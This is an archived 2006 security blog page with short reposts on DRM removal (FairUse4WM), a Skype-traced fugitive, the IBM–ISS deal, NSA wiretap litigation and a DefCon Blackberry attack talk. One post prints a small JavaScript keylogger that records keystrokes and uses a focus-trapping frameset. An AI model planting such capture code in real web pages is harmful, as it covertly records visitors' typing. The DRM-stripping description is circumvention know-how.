The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for August, 2006

FairUse4WM – a WM/DRM removal program

Posted by Xavier Ashe on August 26, 2006

FairUse4WM is a GUI version of drmdbg that supports individualization version .3930 and some WM11 versions.

Basic requirements
1. Only works on individualized DRM file
2. Requires WM10 or WM11. Won't work on WM9.

The program's functioning can be verified with “Demo” DRM files from, as well as those from other Microsoft Solution partners.

This program is ONLY designed and intended to enable fair-use rights to PURCHASED media.
– While I haven't been able to support license expiration/rental detection, please don't use this to abuse rental license
– This code does NOT allow import of KID/SID pairs to preclude its use for piracy

Note that some WM installations will have multiple ECC key-pairs, so
you will likely have to “Extract Keys” using multiple licensed files.
If you find a file that doesn't convert, try extracting keys wth it.
Once your whole set of keys is extracted, you will no longer need to
run WM per file.

Found on the forums. [via]


Posted in Security | Leave a Comment »

Fugitive exec nabbed after Skype call

Posted by Xavier Ashe on August 25, 2006

Kobi Alexander, the founder of Comverse, was nabbed
in Negombo, Sri Lanka yesterday by a private investigator. He is wanted
by the US government in connection with financial fraud charges. He is
accused of profiting from some very shady stock-option deals, to the
detriment of Comverse shareholders. Once the deals became public and he
was indicted, he resigned as CEO and fled the US.

was traced to the Sri Lankan capital of Colombo after he placed a
one-minute call using Skype. That was enough to alert authorities to
his presence and hunt him down.

The fugitive former CEO
may have been convinced that using Skype made him safe from tracking,
but he—and everyone else that believes VoIP is inherently more secure
than a landline—was wrong. Tracking anonymous peer-to-peer VoIP traffic
over the Internet is possible (PDF). In fact, it can be done even if the parties have taken some steps to disguise the traffic.

VoIP and law enforcement have been in the news lately,
due primarily to the Communications Assistance for Law Enforcement Act.
CALEA, passed in 1994, gives the FBI the ability to easily tap landline
and cell phone calls. As written, CALEA had originally included some
exemptions for Internet-based systems, but the FBI convinced the
Federal Communications Commission that they should not apply to VoIP
traffic. As a result, VoIP operators in the US will need to make their
systems wiretap friendly.

If nothing else, Alexander's
capture reinforces the message that despite appearances, nothing we do
on the Internet is truly anonymous.

From ArsTechnica

Posted in Privacy, Security | Leave a Comment »

DSAmp – Control Winamp from your DS

Posted by Xavier Ashe on August 24, 2006

Img413 1080
The DS is a wonderful machine, capable of interacting with a PC in imaginative ways. Now, the clever homebrew community, has come up with a way for the DS to control Winamp. Should any of you DIY-ers out there wish to film yourself giving this a go, send us a link and like Doc Holliday, we'll make you famous.

Now how about someone coming up with a way to stream music or video from Winamp onto the DS?

From DS Fanboy.

Posted in Other Technology | Leave a Comment »

HOPE 2006 Audio Available

Posted by Xavier Ashe on August 24, 2006

We now have available for your listening enjoyment all of the HOPE Number Six talks and panels. To listen, simply go to

We want to thank everyone
who helped to make HOPE Number Six the most successful HOPE conference
yet, judging from the comments we've been getting. If you'd like us to
include your comments, experiences, and feedback concerning this year's
HOPE in our post-HOPE section, send an email to
If you have pictures or videos, send them along as well. We'd also like
to hear your suggestions on how we can make things even better in 2008.

From 2600 News.

Posted in Security | Leave a Comment »

Great Comic

Posted by Xavier Ashe on August 24, 2006

Posted in For Fun, Security | Leave a Comment »

In 2006, China has issued 15 national security standards

Posted by Xavier Ashe on August 24, 2006

In China, network and information security have been getting rising
attention in these years, not only from the government and those large
enterprises, but also from whole society. More and more relevant
standards are issued, and internal control manuals are made and
executed in FSI (Financing, Securities and Insurance) and telecom
enterprises as well to strengthen their compliance management.

Since the beginning of 2006, 15 standards have been published in
security domain by the technical committee TC260, which is responsible for the information
security related standards under the government standardization
, the counterpart of NIST, USA.
Some of them cover the detailed management and technical requirements
for classify security protection, while some of them are updates of the
previous GB/T18336, which is the localized version of ISO15408 (CC).
Additionally, ISO17799:2000 has been adopted as GB/T19716-2005 in 2005.

From Telecom, Security and P2P blog.

Posted in Security | Leave a Comment »

IBM Official Press about ISS Acquisition

Posted by Xavier Ashe on August 23, 2006

IBM (NYSE: IBM) and Internet Security Systems, Inc. (NASDAQ: ISSX)
today announced the two companies have entered into a definitive
agreement for IBM to acquire Internet Security Systems, Inc., a
publicly held company based in Atlanta, Ga., in an all-cash transaction
at a price of approximately $1.3 billion, or $28 per share. The
acquisition is subject to Internet Security Systems, Inc. shareholder
and regulatory approvals and other customary closing conditions. The
transaction is expected to close in the fourth quarter of 2006.

Following completion of the acquisition, IBM intends to:

  • Establish ISS' operations as a business unit within IBM's
    Infrastructure Management Services unit, part of IBM Global Technology
  • Integrate ISS' software technology with Tivoli's IT
    service management portfolio, which includes software for Identity
    Management, Access Management, Service Oriented Architecture (SOA)
    security and Security Information Management
  • Market and sell ISS' Managed Security Services and
    portfolio of Network, Application, Server and Endpoint Protection
    products through IBM's and ISS' worldwide sales channels and Business
  • Further expand the scope and capabilities of IBM's
    business and IT asset management consulting practices, and deliver
    services for ISS-based solutions through IBM Global Services
  • Build upon the companies' existing business relationship, which began in 1999

More information is available in the IBM Press Release.

Posted in Security | Leave a Comment »

ISS, Welcome to the big Blue Family

Posted by Xavier Ashe on August 23, 2006

IBM said on Wednesday it agreed
to buy Internet Security Systems Inc. for $1.3
billion, in a move to beef up its product line in the rapidly
growing business of Internet security.

International Business Machines Corp., the world's largest
information-technology company, said it will pay $28 a share
for Internet Security, continuing an acquisition drive to fuel
growth in its software and services businesses.

The price represents a 7.7 percent premium to Internet
Security's Tuesday closing price of $26 a share on Nasdaq. The
stock rose 7 percent, or $1.82, in premarket trade.

Internet Security, which sells software and runs data
centers that help businesses protect against Internet attacks,
competes against Accenture Ltd. , Check Point Software
Technologies Ltd. , Cisco Systems Inc. , McAfee
Inc. and Symantec Corp. .

“This is something we couldn't do before because we didn't
have the software assets to provide protection against Internet
attacks,” Kristof Kloeckner, vice president of strategy and
technology for IBM's software group, said in an interview.

He said IBM plans to sell Internet Security's products as
services through its global services unit and as software
through its Tivoli software division.

This is really huge.  I am on a very busy project this week, but once I get a free second, I'll post my opinions.  Until then, read the full article on MSN Money.

Posted in Security | Leave a Comment »

Web 2.0 Image Generator

Posted by Xavier Ashe on August 17, 2006

Posted in For Fun | Leave a Comment »

Federal judge orders halt to NSA spy program, rules it unconstitutional

Posted by Xavier Ashe on August 17, 2006

In the first federal challenge ever argued against the Bush
administration's NSA spying program, U.S. District Court Judge Anna
Diggs Taylor rules that the program to monitor the phone calls and
e-mails of millions of Americans without warrants is unconstitutional.
Calling for a halt to this abuse of presidential power, Judge Taylor
states that “[t]here are no hereditary Kings in America and no powers
not created by the Constitution,” so all the president's “inherent
powers” must derive from the Constitution.

Just announced!  From the ACLU website.  Read the decision from the courts (PDF)Here's the CNN story.

UPDATE:  A Banner across the top on reads: The U.S. Department of Justice has announced that it will appeal a
federal judge's ruling that the government's warrantless wiretapping
program is unconstitutional.
  Guess the fights moves on.

Posted in Privacy | Leave a Comment »

Israeli hackers fight Trojan dropping Iranian blog

Posted by Xavier Ashe on August 17, 2006

The Iranian website, in which Iranian officials claim the Iranian President publishes a daily journal, was down for a few hours on Monday.

Following a report by Yedioth Ahronoth on Sunday about the site, Israeli hackers called for a joint effort to hack the site.
On Monday afternoon, the site was down for an hour and in the evening the site worked alternately.

Israelis bloggers claimed Monday that the site was down because of a joint effort by thousands of Israelis to enter the site simultaneously, causing it to crash.

Despite the effort, the site was operational late Sunday evening.

From Ynet  The reason for this is that the Iranian blog was dropping trojans for Israeli IPs.  From Caitlyn Martin's blog:

Iranian President Mahmoud Ahmadenijad now has his very own blog. That’s fine. The content is entirely what you might expect with one notable exception. Several Israeli bloggers, including Yael K.’s Step By Step, which I read regularly, report that if you access the Ahmadenijad blog
from an Israeli IP address the site sends you a little gift, a
cyberattack in the form of a virus or trojan (reports vary) designed to
exploit an Internet Explorer vulnerability.

Posted in Security | Leave a Comment »

A Guide to Information Security Certifications

Posted by Xavier Ashe on August 17, 2006

Many people are confused by the massive number of information security
certifications available today. Some people already have one or more
and are looking to expand, while others are just getting started with
certification and need a place to start. This guide aims to help with
both scenarios.

I'm going to highlight a few of the certification options and offer
a couple of recommended paths for professionals in various stages of
their careers. I'll be rating each credential based on the criteria

  • Difficulty – How hard the test itself is, i.e. study-time needed, difficulty of material, etc.
  • Who – Who should be considering the certification.
  • Respect – Respect rating within the technical infosec-geek community.
  • Renown – How well-know the certification is throughout the industry.
  • Requirements – What's needed to get the cert, e.g. prerequisites, exams, practicals, labs, etc.
  • Cost – What it'll cost you (or your company) to get the credential.
  • Pros – Positive comments about the certification.
  • Cons – Downsides to the certification.
  • Comments – My own input on the credential.

Read the full review on

Posted in Security | Leave a Comment »

XBox 360: Texas Hold 'em Free in Arcade

Posted by Xavier Ashe on August 17, 2006

Microsoft isn't bluffing: Log on to Xbox Live® within the first 48 hours after launch and download Texas Hold 'em
completely free of charge! This full-featured poker title for Xbox Live
Arcade on Xbox 360™ will launch on Wednesday, August 23, at 0800 GMT
(1:00 A.M. Pacific Time).

For 48 hours only—through 0800 GMT
(1:00 A.M. Pacific Time) Friday, August 25—as a special limited-time
only promotion, all Xbox Live Gold and Silver members can download (and
own) the game at no charge. Starting at 0801 GMT (1:01 A.M. Pacific
Time) Friday, August 25, Texas Hold 'em will be available for 800 Microsoft Points.


Posted in For Fun | Leave a Comment »

Blackjacking – 0wning the Enterprise via the Blackberry

Posted by Xavier Ashe on August 17, 2006

Research in Motion's Blackberry technology has
quickly become the defacto standard for executives and technical
personnel alike to maintain unteathered remote access to critical data.
Often regarded as inherently secure, most administrators deploy this
solution without a full understanding of the technology or risks

This presentation
will demonstrate how an attacker could utilize many typical corporate
blackberry deployments to directly attack machines on the internal
network—behind your perimiter defenses! The tools and source code
presented will be available for attendees. Techniques for reducing the
risks associated with this technology will also be presented.

Presentation made at DefCon 14 by Jesse D'Aguanno.  Download the PowerPoint Sides and download the Blackberry Attack ToolkitFrom.

Posted in Security | Leave a Comment »

Bruce Schneier facts – Chuck Norris style

Posted by Xavier Ashe on August 16, 2006

  • If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his barehands
  • Beyond computational complexity, there is Schneiertational complexity
  • Bruce Schneier doesn't need steganography to hide data in innocent-looking files. He just pounds it in with his fist.

Get More Bruce Schneier Facts

Posted in For Fun, Security | Leave a Comment »

Xbox modder gets home detention

Posted by Xavier Ashe on August 9, 2006

Late last year, three men who worked at the ACME Game Store on Melrose Boulevard in Los Angeles were charged
with copyright infringement for selling illegally modded Xboxes. The
consoles were outfitted with special chips and larger hard drives which
allowed them to play and rip illegal copies of games. Jason Jones, the
owner of the store, has been sentenced to six months of home detention,
reports KCAL 9 News.
On top of the six months of home detention, which includes wearing an
electronic ankle bracelet to track his location, Jones will serve three
years of probation. A second man, Jonathon Bryant, will serve only the
three years probation after Jones admitted he was the sole owner of the
store. A third man, Pei Cai, remains at large and is considered a
fugitive. Jones and Bryant were also ordered to pay more than $2,600 to
the Entertainment Software Association (ESA).

From GameSpot News.

Posted in XBox Hacks | Leave a Comment »

Who would win in a fight – Capt. Morgan vs Capt. Kirk?

Posted by Xavier Ashe on August 8, 2006

Posted in For Fun, Personal Note | Leave a Comment »

Plausible Deniability ToolKit

Posted by Xavier Ashe on August 7, 2006

We can only hope you are viewing this via Tor. Once you are done, clear your
browser cache. Reading about Plausible Deniability should not be crime, but
unfortunately having done so could be considered circumstantial evidence that
could be used against you.

The Plausible Deniability Toolkit is not a set of tools to download, but a
set of ideas and philosophies to adapt to protect your privacy in an
ever-increasingly scary world of eroding personal rights. The “hacker defense”
rarely works, even if it is the truth!

This idea was first proposed at DefCon 14.
The slides are available here. As the talk was just
given, please give us a few days of sobriety to add to this page, and know
there are a lot more links coming in the next few days. Feel free to send
suggestions to, but this in itself could be risky. We would
advise you to sent up a Hotmail, Yahoo, or Gmail account via Tor just for this
purpose, and GPG the message if you like. We will have a pdtk GPG key in a
few days.

Plausible Deniability ToolKit

Posted in Privacy | Leave a Comment »

Javascript Keylogger

Posted by Xavier Ashe on August 6, 2006


var keylog='Capturing: ';

document.onkeypress = function () {

window.status = keylog += String.fromCharCode(window.event.keyCode); }


<frameset onLoad=”this.focus();” onBlur=”this.focus();” cols=”100%,*”>

<frame src=”; scrolling=”auto”>


Any questions?  Found on

Posted in Security | Leave a Comment »

Blackhat Presentations

Posted by Xavier Ashe on August 4, 2006

Click here to leech all the Blackhat presentations for everyone like me that has to work this week.

Posted in Security | Leave a Comment »

%d bloggers like this: